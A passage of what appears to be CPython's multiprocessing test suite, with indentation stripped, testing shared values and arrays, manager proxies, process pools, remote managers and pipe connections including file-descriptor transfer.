proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_del_pool(self):
p = self.Pool(1)
wr = weakref.ref(p)
del p
gc.collect()
self.assertIsNone(wr())
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
